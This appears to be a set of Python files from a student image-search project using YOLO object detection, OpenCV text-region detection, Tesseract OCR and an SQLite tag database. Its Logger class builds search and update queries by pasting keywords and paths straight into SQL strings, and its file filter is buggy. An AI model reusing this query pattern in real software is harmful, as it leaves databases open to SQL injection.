path_list = [self.path_dir + '\\' + file_name for file_name in file_name_list if ".jpg" in file_name or ".png" or ".jpeg" in file_name in file_name]
path_list_in_db = logger.getAllPath()
path_list_in_db = [path[0] for path in path_list_in_db]
if Launcher.DEBUG:
print(path for path in path_list if path not in path_list_in_db)
return [path for path in path_list if path not in path_list_in_db]
if __name__ == "__main__":
imageGetter = ImageGetter('yjm6560')
print(imageGetter.getDirPath())
print(imageGetter.getFileList())
--- FILE SEPARATOR ---
import ImageClassifier
import Logger
from FilePath import FilePathGetter
import threading
'''
Launcher
실행 파일
1. db 파일 생성
2. image classify
3. test
'''
#TODO : 지금은 한 번 돌고 끝내는 상황임. 무한으로 돌게 고쳐야됨
#TODO : 계층트리 적용
DEBUG = False
if __name__ == "__main__":
user_1 = "yjm6560"
user_2 = "admin"
user = user_2
#db 파일 생성
logger = Logger.Logger(user)
logger.createTable()
#image classify
IC = ImageClassifier.ImageClassifier(user, logger)
print(f"{len(IC.fileList)}")
if len(IC.fileList) == 0:
exit()
threads = []
threads.append(threading.Thread(target=IC.classifyObjImages_sub, args=(logger, 8)))
threads.append(threading.Thread(target=IC.classifyObjImagesByBatch, args=(logger, 8)))
threads.append(threading.Thread(target=IC.analyzeTextImages, args=(logger, 8)))
if DEBUG:
print("THREAD START")
for i in range(len(threads)):
threads[i].start()
for i in range(len(threads)):
threads[i].join()
if DEBUG:
print("THREAD END")
exit()
#classify images and insert into database
###TEST CODE###
print("="*30)
print("INSERTING IMAGES")
print("="*30)
#test example
tag_data = ["pizza", "dog","cat","cell phone","pizza"]
text_tag = [["shop"],["cat", "shop"],["cat"]]
#search by tag
print("="*30)
print("TAG SEARCH")
print("="*30)
for tag in tag_data:
print("SEARCH TAG : ", tag)
ret = logger.getPhotoByTag([tag])
for dat in ret:
print("\t",dat[1])
#search by text
print("=" * 30)
print("TEXT SEARCH")
print("=" * 30)
for text in text_tag:
print("SEARCH TEXT : ", text)
ret = logger.getPhotoByText(text)
for dat in ret:
print("\t", dat[1])
--- FILE SEPARATOR ---
import sqlite3
import threading
from FilePath import FilePathGetter
'''
Logger
db 접근용 클래스
기능
1. 테이블 생성
2. 텍스트 포함 이미지 삽입
3. 텍스트 미포함 이미지 삽입
4. 태그로 이미지 검색
5. 텍스트로 이미지 검색
'''
#TODO : 텍스트 포함, 미포함으로 나눌지 말지 정해야 함.(현재는 나눠진 상태)
class Logger:
def __init__(self, user_id):
#연결
self.db_name = FilePathGetter.getDBName() + "_" + user_id
self.conn = sqlite3.connect("C:\\Users\\yjm6560\\Desktop\\yjm6560\\CE\\graduation_project\\SearchPicture\\" + self.db_name + ".db", check_same_thread=False)
self.cur = self.conn.cursor()
self.lock = threading.Lock()
def createTable(self):
#db 파일 생성
create_query = "CREATE TABLE IF NOT EXISTS " + self.db_name + "(photo_id integer, path TEXT PRIMARY KEY , tag_list TEXT, text_img TEXT)"
self.cur.execute(create_query)
self.conn.commit()
def getPhotoByTag(self, tag_keywords):
#태그로 이미지 검색
select_query = "SELECT photo_id, path, tag_list FROM " + self.db_name + " WHERE"
for keyword in tag_keywords:
select_query += " tag_list LIKE \"%/" + keyword + "/%\"" + " AND "
self.cur.execute(select_query[0:-5])
return self.cur.fetchall()
def getPhotoByText(self, text_keywords):
#텍스트로 이미지 검색
select_query = "SELECT photo_id, path, tag_list, text_img FROM " + self.db_name + " WHERE"
for keyword in text_keywords:
select_query += " text_img LIKE \"%" + keyword + "%\"" + " AND "
self.cur.execute(select_query[0:-5])
return self.cur.fetchall()
def insertNonTextyPhoto(self, photo_id, photo_path, tag_list):
#텍스트 미포함 이미지 삽입
self.lock.acquire()
insert_query = "INSERT INTO " + self.db_name + "(photo_id, path, tag_list) VALUES( ? , ? , ? )"
try:
self.cur.execute(insert_query, (photo_id, photo_path, "/" + "/".join(tag_list) + "/"))
except sqlite3.IntegrityError as e:
select_query = f"SELECT tag_list FROM {self.db_name} WHERE path=\"{photo_path}\""
self.cur.execute(select_query)
obj_list = self.cur.fetchall()
if obj_list and obj_list[0][0] != "":
print("OBJ LIST : ",obj_list)
tag_list = tag_list + obj_list[0][0].split("/")
update_query = f"UPDATE {self.db_name} SET tag_list = ? WHERE path = ?"
self.cur.execute(update_query, ("/" + "/".join(tag_list) + "/", photo_path))
self.lock.release()
self.conn.commit()
def insertTextyPhoto(self, photo_id, photo_path, text):
#텍스트 포함 이미지 삽입
#TODO: 이어진 글자 사이에 띄어쓰기가 있다고 인식해서 일단 띄어쓰기나 엔터 없앰 추후 어떻게 할지 논의
text = text.replace(" ", "", len(text)).replace("\n", "", len(text))
insert_query = "INSERT INTO " + self.db_name + " VALUES( ? , ? , ? , ?)"
try:
self.cur.execute(insert_query, (photo_id, photo_path, "" , text))
except sqlite3.IntegrityError as e:
update_query = f"UPDATE {self.db_name} SET text_img = ? WHERE path = ?"
self.cur.execute(update_query, (text, photo_path))
self.conn.commit()
def getAllPath(self):
getPath_query = f"SELECT path FROM {self.db_name}"
self.cur.execute(getPath_query)
return self.cur.fetchall()
if __name__ == "__main__":
logger = Logger("yjm6560")
logger.cur.execute("DROP TABLE IF EXISTS " + logger.db_name)
logger.createTable()
logger.insertNonTextyPhoto(1, "a", ["note", "book", "pencil"])
logger.insertNonTextyPhoto(2, "b", ["news", "pen", "monitor"])
logger.insertNonTextyPhoto(3, "c", ["news", "phone", "monitor"])
logger.insertNonTextyPhoto(4, "d", ["mouse", "fly", "monitor"])
logger.insertTextyPhoto(5, "e", [], "Latte is horse")
logger.insertTextyPhoto(6, "f", [], "I was a car")
print(logger.getPhotoByText(["horse"]))
print(logger.getPhotoByText(["car", "was"]))
print(logger.getPhotoByTag(["monitor", "pen"]))
--- FILE SEPARATOR ---
import cv2
import argparse
import numpy as np
import Launcher
'''
Yolo
Object Detector
생성
yolov3.weights, yolov3.cfg, yolov3.txt 세 개의 경로를 인자로 넣어주면 됨
기능
1. 인자로 받은 이미지 classify
'''
#TODO : 1. OCR 적용 2. batch 적용
class Yolo:
def __init__(self, weights, cfg, names):
self.weights_file = weights
self.config_file = cfg
self.classes_file = names
self.classes = []
with open(self.classes_file, 'r') as f:
self.classes = [line.strip() for line in f.readlines()]
def get_output_layers(self, net):
layer_names = net.getLayerNames()
output_layers = [layer_names[i[0] - 1] for i in net.getUnconnectedOutLayers()]
return output_layers
def draw_prediction(self, img, class_id, confidence, x, y, x_plus_w, y_plus_h):
label = str(self.classes[class_id])
COLORS = np.random.uniform(0, 255, size=(len(self.classes), 3))
color = COLORS[class_id]
cv2.rectangle(img, (x, y), (x_plus_w, y_plus_h), color, 2)
cv2.putText(img, label, (x - 10, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, color, 2)
def detectObj_in_Image(self, image):
net = cv2.dnn.readNet(self.weights_file, self.config_file)
return self.classifyOneImage(net, image)
def detectObj_in_Images(self, images, batch_size=8):
net = cv2.dnn.readNetFromDarknet(self.config_file, self.weights_file)
net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)
net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)
if batch_size == 1:
return [self.classifyOneImage(net, images)]
else:
return self.classifyImages(net, images, batch_size)
def classifyImages(self, net, images, batch_size=8):
result_list = []
scale = 0.00392
blob = cv2.dnn.blobFromImages(images, scale, (416, 416), (0, 0, 0), True, crop=False)
net.setInput(blob)
outs = net.forward(self.get_output_layers(net))
for out in outs:
for classified in out:
class_list = []
for detection in classified:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > 0.5:
if self.classes[class_id] not in class_list:
class_list.append(self.classes[class_id])
result_list.append(class_list)
return result_list[:batch_size]
def classifyOneImage(self, net, image):
scale = 0.00392
class_list = []
blob = cv2.dnn.blobFromImage(image, scale, (416, 416), (0, 0, 0), True, crop=False)
net.setInput(blob)
outs = net.forward(self.get_output_layers(net))
for out in outs:
for detection in out:
scores = detection[5:]
class_id = np.argmax(scores)
confidence = scores[class_id]
if confidence > 0.5:
if class_id not in class_list:
class_list.append(self.classes[class_id])
return class_list
def parser(self):
ap = argparse.ArgumentParser()
ap.add_argument('-i', '--image', required=True, help='path to input image')
ap.add_argument('-c', '--config', required=True, help='path to yolo config file')
ap.add_argument('-w', '--weights', required=True,help='path to yolo pre-trained weights')
ap.add_argument('-cl', '--classes', required=True,help='path to text file containing class names')
args = ap.parse_args()
return args
if __name__ == "__main__":
yolo = Yolo('yolov3.weights', 'yolov3.cfg', 'yolov3.txt')
# yolo = Yolo('yolo-obj_final.weights', 'yolo-obj.cfg', 'myObj.names')
# yolo = Yolo('darknet\yolo9000\yolo9000.weights', 'darknet\yolo9000\yolo9000.cfg', 'darknet\yolo9000\9k.names')
print(yolo.detectObj_in_Image(cv2.imread('cat.jpg')))
--- FILE SEPARATOR ---
#this code for testing(ROI)
import cv2
import numpy as numpy
from PIL import Image
import os
import copy
import pytesseract
pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract'
files = os.listdir('./')
test_no = 25
new_width = 720
kernel1_size = 3
block_size = 15
subtract = 3
kernel2_size = 3
it = 1
min_w = 40
min_h = 10
for f in files:
print('*****' + f + ' start*****')
#path = os.path.join(os.getcwd(), 'images', f)
img = cv2.imread(f)
image_name = f.split('.')[0]
#크기 보정하기
height, width, channel = img.shape
new_height = int((height * new_width)/width)
resizing_image = cv2.resize(img, dsize=(new_width, new_height), interpolation=cv2.INTER_AREA)
#grayscale로 변환
gray_image = cv2.cvtColor(resizing_image, cv2.COLOR_BGR2GRAY)
#morph gradient
kernel1 = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel1_size, kernel1_size))
morph_image = cv2.morphologyEx(gray_image, cv2.MORPH_GRADIENT, kernel1)
#adaptive gaussian threshold
adaptive_gaussian_image = cv2.adaptiveThreshold(morph_image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, block_size, subtract)
#morph close
kernel2 = cv2.getStructuringElement(cv2.MORPH_RECT, (kernel2_size, kernel2_size))
dilation = cv2.dilate(adaptive_gaussian_image, kernel2, iterations=it)
erosion = cv2.erode(dilation, kernel2, iterations=it)
#find contour
contours, b = cv2.findContours(erosion, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
#contour처리하기
rect_list = []
new_rect = []
rrect = []
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
r = [x,y,w,h]
if r not in rrect:
'''
if abs(w-new_width) < 10 and abs(h-new_height) < 10:
print('continue')
print(str(x) + ' ' + str(y) + str(w) + str(h))
print(str(new_width) + ' ' + str(new_height))
#21번에서 수정
continue
'''
if (x==0 and y==0) or abs(w-new_width) <= 5 or abs(h-new_height) <= 5:
continue
if w >= min_w and h >= min_h:
rect_list.append([x,y,w,h])
new_rect.append([x,y,w,h])
rrect.append([x,y,w,h])
'''
#1번 알고리즘
for r1 in rect_list:
x1,y1,w1,h1 = r1
for r2 in new_rect:
x2,y2,w2,h2 = r2
if ((x2-x1)>0 and (x2-x1)<=20) or ((y2-y1)>0 and (y2-y1)<=20):
if w1<w2 and h1<h2:
print(r1)
if r1 in rrect:
rrect.remove(r1)
print('remove')
'''
#2번 알고리즘
for r1 in rect_list:
x1,y1,w1,h1 = r1
for r2 in new_rect:
x2,y2,w2,h2 = r2
if (x1>x2 and y1>y2) and (((x1+w1)<(x2+w2)) and ((y1+h1)<(y2+h2))):
if r1 in rrect:
rrect.remove(r1)
'''
#5번알고리즘
for r1 in rect_list:
x1,y1,w1,h1 = r1
for r2 in new_rect:
x2,y2,w2,h2 = r2
if (abs(x1-x2) < 10 and (abs(y1-y2) < 10 or abs(y1+h1 - (y2+h2)) < 10)) or (abs(x1+w1-(x2+w2))<10 and (abs(y1-y2)<10 or abs(y1+h1 - (y2+h2))<10)):
if r1 in rrect:
rrect.remove(r1)
'''
#4번 알고리즘 가로 합치기
rrects1 = copy.deepcopy(rrect)
rrects2 = copy.deepcopy(rrect)
merge = copy.deepcopy(rrect)
end = False
while not end:
end = True
for rect1 in rrects1:
x1,y1,w1,h1 = rect1
for rect2 in rrects2:
x2,y2,w2,h2 = rect2
if abs((x1 + w1) - x2) < 10 and abs(y1- y2) < 10 and abs(h1 - h2) < 10:
new_x = x1
new_y = min([y1,y2])
new_w = x2 + w2 - x1
new_h = max([y1+h1, y2+h2]) - new_y
merge.remove(rect1)
merge.remove(rect2)
merge.append([new_x,new_y,new_w,new_h])
rrects1 = copy.deepcopy(merge)
rrects2 = copy.deepcopy(merge)
end = False
break
if not end:
break
#3번 알고리즘 세로 합치기
rects1 = copy.deepcopy(merge)
rects2 = copy.deepcopy(merge)
final = copy.deepcopy(merge)
end = False
while not end:
end = True
for rect1 in rects1:
x1,y1,w1,h1 = rect1
for rect2 in rects2:
x2,y2,w2,h2 = rect2
if abs((y1+h1) - y2) < 10 and abs(x1 - x2) < 10:
new_x = min([x1,x2])
new_y = y1
new_w = max([x1+w1, x2+w2]) - new_x
new_h = y2 + h2 - y1
final.remove(rect1)
final.remove(rect2)
final.append([new_x, new_y, new_w, new_h])
rects1 = copy.deepcopy(final)
rects2 = copy.deepcopy(final)
end = False
break
if not end:
break
'''
for rect1 in rects1:
x1,y1,w1,h1 = rect1
for rect2 in rects2:
x2,y2,w2,h2 = rect2
if abs((y1+h1) - y2) < 10 and abs(x1 - x2) < 10:
if rect1 in final:
final.remove(rect1)
if rect2 in final:
final.remove(rect2)
new_h = y2 + h2 - y1
new_w = max([x1+w1, x2+w2]) - x1
final.append([x1,y1,new_w,new_h])
'''
'''
#6번 알고리즘
final1 = copy.deepcopy(final)
final2 = copy.deepcopy(final)
for r1 in final1:
x1,y1,w1,h1 = r1
for r2 in final2:
x2,y2,w2,h2 = r2
if w1<w2 and h1<h2:
if abs(x1-x2) <= 10:
if abs(y1-y2) <= 10 or abs((y1+h1)-(y2-h2)) <= 10:
if r1 in final:
final.remove(r1)
elif abs((x1+w1)-(x2+w2)) < 10:
if abs(y1-y2) <= 10 or abs((y1+h1)-(y2-h2)) <= 10:
if r1 in final:
final.remove(r1)
'''
'''
#2번 알고리즘
final1 = copy.deepcopy(final)
final2 = copy.deepcopy(final)
for r1 in final1:
x1,y1,w1,h1 = r1
for r2 in final2:
x2,y2,w2,h2 = r2
if (x1>x2 and y1>y2) and (((x1+w1)<(x2+w2)) and ((y1+h1)<(y2+h2))):
if r1 in final:
final.remove(r1)
'''
imagelist = []
ori_image = Image.fromarray(resizing_image, mode='RGB')
for rect in final:
x,y,w,h = rect
a = cv2.rectangle(resizing_image, (x,y), (x+w,y+h), (0,255,0), 2)
area = (x,y,x+w,y+h)
cropped_image = ori_image.crop(area)
imagelist.append(cropped_image)
'''
#tesseract
result = ''
i = 0
for img in imagelist:
i = i + 1
string = pytesseract.image_to_string(img, lang='kor')
result = '#' + str(i) + ' ' + result + string + '\n'
print(result)
'''
'''
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
if w >= min_w and h >= min_h:
a = cv2.rectangle(resizing_image, (x,y), (x+w,y+h), (0,255,0), 2)
'''
#이미지 저장
Image.fromarray(resizing_image, mode='RGB').save(image_name + '_' + str(test_no) + '.jpg')
print('*****' + f + ' end*****')
--- FILE SEPARATOR ---
#detect text region in image by OpenCV
import cv2
import numpy as np
from PIL import Image
import os
import copy
'''
*Text Region 추출 과정
1. color image를 grayscale 이미지로 변환
2. Adpative Threshold를 적용해서 잡영 제거
3. Morph close로 경계 강화
4. Long line Remove로 글씨 추출에 방해가 되는 요소 제거
5. find contours로 텍스트 영역 찾기
TODO
*조정이 필요한 parameter들
adaptiveThreshold() : block_size, subtract_val
morphClose() : widht, height, iter
*일정 크기 이하의 박스를 버릴지 냅둘지도 정해야됨
*findcontour함수에 rectangle 친걸 잘라서 넘길지 어떻게 할지..
'''
class FindTextRegion:
def __init__(self):
self.new_width = 720
def setImage(self, img):
self.original_image = img
def changeImageSize(self):
height, width, channel = self.original_image.shape
self.new_height = int((height * self.new_width) / width)
if width >= self.new_width:
self.resizing_image = cv2.resize(self.original_image, dsize=(self.new_width, self.new_height), interpolation=cv2.INTER_AREA)
else:
self.resizing_image = cv2.resize(self.original_image, dsize=(self.new_width, self.new_height), interpolation=cv2.INTER_CUBIC)
def imageConverting(self):
gray_image = cv2.cvtColor(self.resizing_image, cv2.COLOR_BGR2GRAY)
return gray_image
def morphGradient(self, gray_image, width=3, height=3):
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (width, height))
morph_image = cv2.morphologyEx(gray_image, cv2.MORPH_GRADIENT, kernel)
return morph_image
def adaptiveThreshold(self, morph_image, block_size = 15, subtract_val = 3):
#block_size : 픽셀에 적용할 threshold 값을 계산하기 위한 블럭 크기. 적용될 픽셀이 블럭의 중심이 됨. 따라서 홀수만 가능
#subtract_val : 보정 상수
adaptive_gaussian_image = cv2.adaptiveThreshold(morph_image, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, block_size, subtract_val)
return adaptive_gaussian_image
def morphClose(self, adaptive_gaussian_image, width = 3, height = 3, it = 1):
#width와 height는 커널의 사이즈
#커널 창으로 이미지 전체를 훑으면서 커널창에 들어온 matrix 값들을 변경한다
kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (width, height))
#1. cv2.morphologyEX()를 사용하거나 2. cv2.dilate()하고 cv2.erode()하는 방법도 있음
#1번 방법
#self.closing_image = cv2.morphologyEx(adaptive_gaussian_image, cv2.MORPH_CLOSE, kernel)
#2번 방법
dilation = cv2.dilate(adaptive_gaussian_image, kernel, iterations=it)
erosion = cv2.erode(dilation, kernel, iterations=it)
return erosion
def longLineRemove(self, closing_image, threshold = 100, min_line_length = 80, max_line_gap = 5):
#min_line_length : 선으로 판단되는 최소 길이
#max_line_gap : 이 값 이상 떨어져 있으면 별개의 직선으로 판단
lines = cv2.HoughLinesP(closing_image, 1, np.pi/180, threshold, min_line_length, max_line_gap)
for line in lines:
x1, y1, x2, y2 = line[0]
cv2.line(closing_image, (x1, y1), (x2, y2), (0,255,0), 2)
return closing_image
def findContours(self, image):
contours, b = cv2.findContours(image, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
min_w = 40
min_h = 10
rect = []
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
r = [x,y,w,h]
if r not in rect:
if (x==0 and y==0) or abs(w-self.new_width)<=5 or abs(h-self.new_height)<=5:
continue
if w >= min_w and h >= min_h:
rect.append(r)
rect1 = copy.deepcopy(rect)
rect2 = copy.deepcopy(rect)
#겹치는거 삭제
for r1 in rect1:
x1,y1,w1,h1 = r1
for r2 in rect2:
x2,y2,w2,h2 = r2
if (x1>x2 and y1>y2) and (((x1+w1)<(x2+w2)) and ((y1+h1)<(y2+h2))):
if r1 in rect:
rect.remove(r1)
#가로 합치기
rect1 = copy.deepcopy(rect)
rect2 = copy.deepcopy(rect)
end = False
while not end:
end = True
for r1 in rect1:
x1,y1,w1,h1 = r1
for r2 in rect2:
x2,y2,w2,h2 = r2
if abs((x1 + w1) - x2) < 10 and abs(y1- y2) < 10 and abs(h1 - h2) < 10:
new_x = x1
new_y = min([y1,y2])
new_w = x2 + w2 - x1
new_h = max([y1+h1, y2+h2]) - new_y
rect.remove(r1)
rect.remove(r2)
rect.append([new_x,new_y,new_w, new_h])
rect1 = copy.deepcopy(rect)
rect2 = copy.deepcopy(rect)
end = False
break
if not end:
break
#세로 합치기
rect1 = copy.deepcopy(rect)
rect2 = copy.deepcopy(rect)
end = False
while not end:
end = True
for r1 in rect1:
x1,y1,w1,h1 = r1
for r2 in rect2:
x2,y2,w2,h2 = r2
if abs((y1+h1) - y2) < 10 and abs(x1 - x2) < 10:
new_x = min([x1,x2])
new_y = y1
new_w = max([x1+w1, x2+w2]) - new_x
new_h = y2 + h2 - y1
rect.remove(r1)
rect.remove(r2)
rect.append([new_x,new_y,new_w,new_h])
rect1 = copy.deepcopy(rect)
rect2 = copy.deepcopy(rect)
end = False
break
if not end:
break
imagelist = []
ori_image = Image.fromarray(self.resizing_image)
for contour in rect:
x,y,w,h = contour
area = (x,y,x+w,y+h)
croppend_image = ori_image.crop(area)
imagelist.append(croppend_image)
a = cv2.rectangle(self.resizing_image, (x,y), (x+w,y+h), (0,255,0), 2)
Image.fromarray(self.resizing_image, mode='RGB').save('x.jpg')
'''
for contour in contours:
x,y,w,h = cv2.boundingRect(contour)
#r = cv2.rectangle(self.resizing_image, (x,y), (x+w, y+h), (0,255,0), 2)
area = (x, y, x + w, y + h)
cropped_img = ori_image.crop(area)
imagelist.append(cropped_img)
#cropped_img.show()
'''
return imagelist
def findTextRegion(self, g_width, g_height, block_size, subtract_val, c_width, c_height, c_iter):
#change image size -> grayscale -> morph gradient -> adaptive gaussian threshold -> morph close -> find contour
self.changeImageSize()
gray_image = self.imageConverting()
morph_image = self.morphGradient(gray_image, g_width, g_height)
adaptive_gaussian_image = self.adaptiveThreshold(morph_image, block_size, subtract_val)
closing_image = self.morphClose(adaptive_gaussian_image, c_width, c_height, c_iter)
#longlineremove
imagelist = self.findContours(closing_image)
return imagelist
#사용 예시
'''
if __name__ == '__main__':
path = os.path.join('1.jpg')
img = cv2.imread(path)
f = FindTextRegion(img)
f.changeImageSize()
gray_image = f.imageConverting()
Image.fromarray(gray_image).save('y1.jpg')
morph_image = f.morphGradient(gray_image)
Image.fromarray(morph_image).save('y2.jpg')
adaptive_gaussian_image = f.adaptiveThreshold(morph_image)
Image.fromarray(adaptive_gaussian_image).save('y3.jpg')
closing_image = f.morphClose(adaptive_gaussian_image)
Image.fromarray(closing_image).save('y4.jpg')
result = f.findContours(closing_image)
print(result)
#Image.fromarray(result).save('y4.jpg')
'''
--- FILE SEPARATOR ---
#tesseract ocr
import pytesseract
import Launcher
import text.FindTextRegion as FindTextRegion
import cv2
import multiprocessing
'''
class는 이미지가 저장된 경로와 이미지의 텍스트 부분이 잘린 조각 이미지들(list)이 넘어오면
각 조각 이미지들 내의 텍스트를 인식하고 이를 하나의 string으로 합친 후 database에 저장하도록 합니다
TODO
database에 저장하는 부분 어떻게 할지
test 필요
'''
class TesseractOCR:
def __init__(self):
#images는 numpy.ndarray들의 list여야한다
pytesseract.pytesseract.tesseract_cmd = r'C:\\Program Files\\Tesseract-OCR\\tesseract' #tesseract가 저장된 경로 입력
self.findtextregion = FindTextRegion.FindTextRegion()
def single_ocr(self, img, q):
string = pytesseract.image_to_string(img, lang='kor+eng')
q.put(string)
return string
def parallel_ocr(self, text_region_list, batch_size=8):
'''
#no batch
for img in text_region_list:
string = pytesseract.image_to_string(img, lang='eng+kor')
result = result + string + '\n'
'''
#parallel ocr
print(str(len(text_region_list)) + ' regions')
result = ''
for i in range(int(len(text_region_list)/batch_size) + 1):
ret = None
if i*batch_size == len(text_region_list):
break
elif (i+1)*batch_size > len(text_region_list):
ret = text_region_list[i*batch_size:]
else:
ret = text_region_list[i*batch_size:(i+1)*batch_size]
procs = []
q = multiprocessing.Queue()
for img in ret:
#recv_end, send_end = multiprocessing.Pipe(False)
proc = multiprocessing.Process(target=self.single_ocr, args=(img,q,))
procs.append(proc)
#pipe_list.append(recv_end)
proc.start()
for proc in procs:
proc.join()
while not q.empty():
string = q.get()
result = result + string
return result
def findTextOnImage(self, image):
#image는 cv2.imread()로 읽은 사진
self.findtextregion.setImage(image)
text_region_list = self.findtextregion.findTextRegion(3, 3, 15, 3, 3, 3, 1)
result = self.parallel_ocr(text_region_list)
return result
#text
if __name__ == "__main__":
a = cv2.imread('6.jpg')
b = TesseractOCR()
result = b.findTextOnImage(a)
print('********result*********')
print(result)
|
[
"/FilePath.py",
"/HierarchyTree/HierarchyTree.py",
"/HierarchyTree/ImagenetClassFilter.py",
"/HierarchyTree/NaverGoodsTreeConverter.py",
"/ImageClassifier.py",
"/ImageGetter.py",
"/Launcher.py",
"/Logger.py",
"/Yolo/Yolo.py",
"/test/ROItest.py",
"/text/FindTextRegion.py",
"/text/TesseractOCR.py"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.